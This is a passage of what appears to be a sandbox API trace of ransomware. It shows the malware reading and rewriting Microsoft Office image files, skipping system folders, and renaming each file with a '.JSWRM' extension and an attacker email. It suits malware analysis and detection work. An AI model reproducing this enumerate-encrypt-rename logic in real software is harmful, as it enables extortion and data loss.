cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.207] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1820) returned 1 [0133.207] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.207] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x710, lpOverlapped=0x0) returned 1 [0133.208] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.208] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x710, lpOverlapped=0x0) returned 1 [0133.209] CloseHandle (hObject=0x238) returned 1 [0133.209] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.210] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.contrast-black_scale-140.png", cAlternateFileName="MS97A4~1.PNG")) returned 1 [0133.210] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.210] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.210] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.210] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.210] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0133.210] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0133.210] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.210] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.210] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0133.210] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0133.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0133.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0133.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.211] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2034) returned 1 [0133.211] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.211] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7f0, lpOverlapped=0x0) returned 1 [0133.213] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.213] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7f0, lpOverlapped=0x0) returned 1 [0133.213] CloseHandle (hObject=0x238) returned 1 [0133.213] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.214] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9c7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.contrast-black_scale-180.png", cAlternateFileName="MSE439~1.PNG")) returned 1 [0133.214] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.214] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.214] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.214] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.214] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0133.214] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0133.214] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.214] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.214] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0133.214] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0133.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0133.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0133.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.215] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2503) returned 1 [0133.215] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.215] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9c0, lpOverlapped=0x0) returned 1 [0133.217] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.217] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9c0, lpOverlapped=0x0) returned 1 [0133.217] CloseHandle (hObject=0x238) returned 1 [0133.217] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.218] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x637, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.contrast-black_scale-80.png", cAlternateFileName="MSE1AD~1.PNG")) returned 1 [0133.218] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.218] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.218] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.218] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.218] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0133.218] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0133.218] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.218] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.218] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0133.218] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0133.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0133.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0133.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0133.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-black_scale-80.png", cchWideChar=42, lpMultiByteStr=0x22d0d8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 42 [0133.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.220] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1591) returned 1 [0133.220] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.220] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x630, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x630, lpOverlapped=0x0) returned 1 [0133.223] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.223] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x630, lpOverlapped=0x0) returned 1 [0133.223] CloseHandle (hObject=0x238) returned 1 [0133.223] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.224] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x717, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.contrast-white_scale-100.png", cAlternateFileName="MS5BCF~1.PNG")) returned 1 [0133.224] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.224] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.224] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.224] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.224] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0133.224] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0133.224] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.224] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.224] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0133.224] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0133.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0133.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0133.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.225] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1815) returned 1 [0133.225] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.226] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x710, lpOverlapped=0x0) returned 1 [0133.234] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.234] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x710, lpOverlapped=0x0) returned 1 [0133.234] CloseHandle (hObject=0x238) returned 1 [0133.235] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.236] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.contrast-white_scale-140.png", cAlternateFileName="MSA854~1.PNG")) returned 1 [0133.236] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.236] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.236] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.236] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.236] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0133.236] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0133.236] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.236] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.236] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0133.236] lstrcmpiW (lpString1="MsPubLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0133.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0133.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.contrast-white_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0133.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 